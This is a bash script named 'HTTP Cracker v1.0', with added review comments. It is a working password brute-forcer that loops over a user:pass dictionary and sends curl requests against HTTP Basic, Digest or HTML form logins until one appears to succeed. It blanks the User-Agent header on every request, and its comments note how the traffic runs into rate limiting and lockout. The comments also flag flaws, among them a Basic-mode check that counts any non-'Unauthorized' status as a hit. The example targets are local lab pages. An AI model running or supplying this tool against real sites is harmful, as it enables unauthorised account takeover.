http_cracker.sh

#!/bin/bash

# Print the usage banner (flags, the three auth modes and four example
# invocations) on stdout, then terminate the script with exit status 1.
# Takes no arguments. Note that this definition shadows bash's builtin `help`.
help () {
    printf '%s\n' \
        ' ---------------- HTTP Cracker v1.0 (20151206) ---------------------- ' \
        ' -u [URL] set the url for crack ' \
        ' -d [filename] a dic file contain many user:pass line' \
        ' -m [mode] set the crack mode {0:basic 1:digest 2:form}, default is 0 ' \
        ' -s [strings] set error string for the form mode ' \
        ' -g manual get error string for the form mode ' \
        '' \
        ' example: ' \
        ' 1. http_cracker.sh -u "http://127.0.0.1:80/auth_basic/" -d 1.txt -m 0 ' \
        ' 2. http_cracker.sh -u "http://127.0.0.1:80/auth_digest/" -d 1.txt -m 1 ' \
        ' 3. http_cracker.sh -u "http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}" -d 1.txt -m 2 -g ' \
        ' 4. http_cracker.sh -u "http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}" -d 1.txt -m 2 -s "Yahei" ' \
        ' -------------------------------------------------------------------- '
    exit 1
}

# Parse the command line. The leading ':' in the optstring puts getopts in
# silent mode, so unknown flags and missing arguments produce no message and
# fall through the case without setting anything.
#   -u URL     -> opt_url      -d FILE   -> opt_dic
#   -m MODE    -> opt_mode     -s STRING -> opt_string
#   -g         -> opt_get=1
while getopts ":u:d:m:s:g" Option; do
    case "$Option" in
        u) opt_url=$OPTARG ;;
        d) opt_dic=$OPTARG ;;
        m) opt_mode=$OPTARG ;;
        s) opt_string=$OPTARG ;;
        g) opt_get=1 ;;
    esac
done
# Drop the parsed flags so only positional arguments remain.
shift $((OPTIND - 1))

# The target URL (-u) and the dictionary file (-d) are both mandatory; when
# either is missing, help prints the usage text and exits with status 1.
# NOTE(review): the expansions inside these [ ] tests are unquoted, so a value
# containing whitespace or glob characters is word-split before the test runs.
[ -z $opt_url ] && help
[ -z $opt_dic ] && help

# Defaults: mode 0 (HTTP Basic) and no manual capture of the error string.
[ -z $opt_mode ] && opt_mode=0
[ -z $opt_get ] && opt_get=0

# Form mode (2) needs either -g (print the response) or -s (the error string
# that marks a failed login); with neither, show the usage text and exit.
[ 2 == $opt_mode ] && [ 0 == $opt_get ] && [ -z $opt_string ] && help

# Per-request time limit in seconds, passed to curl -m in the loop below.
var_sock_timeout=3
# Separator between user and password inside each dictionary entry.
var_pairs_delim=':'

# Main loop: one login attempt per dictionary entry, strictly serial, with no
# delay between attempts. It stops at the first reported hit or at the first
# empty curl response.
# Every curl call passes --user-agent "", which makes curl omit the User-Agent
# header, and -m to cap the request at $var_sock_timeout seconds. Server-side
# this appears as a run of User-Agent-less requests from one client with
# changing credentials (HEAD requests in modes 0 and 1, POSTs in mode 2) --
# the pattern that failed-login rate limiting and account lockout cut off.
echo 'Running...'
# $(cat ...) is unquoted: the file is split on any whitespace, not only on
# newlines, and each resulting word is subject to glob expansion.
for var_pairs in $(cat $opt_dic)
do
    # Only the first two ':'-separated fields of the entry are used.
    user=`echo $var_pairs | cut -d $var_pairs_delim -f 1`
    pass=`echo $var_pairs | cut -d $var_pairs_delim -f 2`

    if [ 0 == $opt_mode ]; then
        # Mode 0, HTTP Basic: header-only request (-I) carrying the candidate pair.
        ret=$(curl --user-agent "" -m $var_sock_timeout -s -I $opt_url --basic -u $user:$pass)
        # Empty output is reported as a connect timeout and ends the run.
        [ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
        # Keep the third whitespace-separated field of the first response line,
        # i.e. the first word of the reason phrase (e.g. "Unauthorized").
        ret=`echo "$ret" | awk 'NR==1 {print $3}'`
        # NOTE(review): any value other than "Unauthorized" in that field is
        # reported as a hit, including other error statuses and a status line
        # that carries no reason phrase.
        [ -z `echo $ret | grep 'Unauthorized'` ] && echo -e "\n[$user:$pass] is Found!!! [$opt_url]" && break
    elif [ 1 == $opt_mode ]; then
        # Mode 1, HTTP Digest: same header-only request, with --digest.
        ret=`curl --user-agent "" -m $var_sock_timeout -s -I $opt_url --digest -u $user:$pass`
        [ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
        # A hit requires a literal "HTTP/1.1 200 OK" somewhere in the headers.
        ret=`echo "$ret" | grep 'HTTP/1.1 200 OK'`
        [ ! -z "$ret" ] && echo && echo "[$user:$pass] is Found!!! [$opt_url]" && break
    elif [ 2 == $opt_mode ]; then
        # Mode 2, HTML form: -u has the shape ENDPOINT@BODY. The first
        # '@'-separated field is the endpoint, the second is the body template.
        var_http_form_url=`echo $opt_url | cut -d '@' -f 1`
        var_http_form_dat=`echo $opt_url | cut -d '@' -f 2`
        # Substitute the first {USER} and the first {PASS} in the template.
        var_http_form_dat=${var_http_form_dat/\{USER\}/$user}
        var_http_form_dat=${var_http_form_dat/\{PASS\}/$pass}
        # --data makes curl send the body as a POST.
        ret=`curl --user-agent "" -m $var_sock_timeout -s $var_http_form_url --data "$var_http_form_dat"`
        [ -z "$ret" ] && printf "err: connect timeout! [%s]\n" $opt_url && break
        if [ 1 == $opt_get ]; then
            # -g: print the first response body and stop, so that an error
            # string for -s can be picked from it by hand.
            echo "$ret" && break
        else
            # A response that does not match the -s string (grep treats it as
            # a pattern) is reported as a hit.
            ret=`echo "$ret" | grep "$opt_string"`
            [ -z "$ret" ] && echo -e "\n[$user:$pass] is Found!!! [$opt_url]" && break
        fi
    fi

    # Progress marker: one '*' per attempt that did not end the loop.
    echo -n '*'
done

# Closing banner, printed whether or not a pair was reported.
echo
echo 'Game Over'
echo
